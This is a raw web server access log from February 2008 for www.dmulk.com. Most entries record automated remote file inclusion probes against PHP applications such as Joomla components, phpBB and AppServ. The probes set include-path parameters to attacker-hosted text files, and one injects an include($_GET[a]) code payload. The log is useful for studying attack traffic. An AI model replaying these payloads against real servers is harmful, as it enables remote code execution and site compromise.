74.220.215.212 - - [04/Feb/2008:06:10:37 -0800] "GET /services.php?page=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.212 - - [04/Feb/2008:06:10:37 -0800] "GET /logs/services.php?page=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.132.54 - - [04/Feb/2008:06:11:11 -0800] "GET /services.php?page=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.51.148.105 - - [04/Feb/2008:06:12:26 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.51.148.105 - - [04/Feb/2008:06:12:26 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.51.148.105 - - [04/Feb/2008:06:12:31 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:06:12:43 -0800] "GET /logs/?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 33113 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:12:58 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:12:58 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:12:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:13:00 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:14:59 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:14:59 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:15:01 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:15:01 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:15:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:06:15:31 -0800] "GET /logs/access_080118.log//modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:15:36 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:15:36 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:15:37 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:16:02 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:16:16 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:16:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:16:16 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:16:17 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:16:26 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:17:03 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:17:03 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:17:03 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:17:47 -0800] "GET /logs/access_080117.log/old_reports.php?file=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:17:47 -0800] "GET /old_reports.php?file=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:17:48 -0800] "GET /logs/old_reports.php?file=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:17:53 -0800] "GET /logs/access_071224.log/old_reports.php?file=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.51.148.105 - - [04/Feb/2008:06:19:15 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [04/Feb/2008:06:19:34 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [04/Feb/2008:06:19:34 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [04/Feb/2008:06:19:34 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [04/Feb/2008:06:19:55 -0800] "GET /logs/access_080118.log//modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:21:41 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:21:41 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:21:42 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:21:51 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:21:51 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:21:51 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:21:55 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:22:11 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:22:11 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:22:11 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:23:03 -0800] "GET /logs/access_080110.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:24:06 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:24:06 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:24:07 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:24:38 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:24:38 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:24:38 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:25:34 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:25:34 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:25:35 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:25:36 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:25:36 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:25:36 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.155 - - [04/Feb/2008:06:25:48 -0800] "GET /logs/access_071019.log HTTP/1.0" 200 78488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:06:25:57 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:26:01 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:26:01 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:26:02 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:27:29 -0800] "GET /logs/access_080106.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
64.135.210.75 - - [04/Feb/2008:06:27:45 -0800] "GET /logs//source/includes/load_forum.php?mfh_root_path=http://sh4d0w-crew.net/lol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.135.210.75 - - [04/Feb/2008:06:27:45 -0800] "GET //source/includes/load_forum.php?mfh_root_path=http://sh4d0w-crew.net/lol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:28:15 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:29:13 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:29:13 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:29:13 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:29:20 -0800] "GET /logs/access_071230.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:29:21 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:29:26 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:29:30 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:32:20 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:32:24 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:32:24 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:32:24 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:32:44 -0800] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:33:15 -0800] "GET /logs/access_080125.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:33:44 -0800] "GET //skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:06:33:44 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:34:09 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:34:10 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:34:10 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:34:34 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:06:35:40 -0800] "GET //?mosConfig_absolute_path=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.66.107 - - [04/Feb/2008:06:35:47 -0800] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:35:57 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:35:57 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
66.79.168.42 - - [04/Feb/2008:06:36:02 -0800] "GET /logs/access_080117.log/index.php?body=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [04/Feb/2008:06:36:02 -0800] "GET /index.php?body=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [04/Feb/2008:06:36:02 -0800] "GET /logs/index.php?body=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.133.76 - - [04/Feb/2008:06:37:11 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:39:24 -0800] "GET //skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:39:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:39:54 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:39:54 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:39:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:06:40:12 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:06:40:56 -0800] "GET //?mosConfig_absolute_path=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:41:23 -0800] "GET /logs/access_071230.log//administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:41:23 -0800] "GET //administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.36.183 - - [04/Feb/2008:06:41:23 -0800] "GET /logs//administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:06:41:25 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:06:41:25 -0800] "GET //?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:06:41:25 -0800] "GET /logs//?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 200 33802 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:41:37 -0800] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:42:28 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:42:28 -0800] "GET //skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
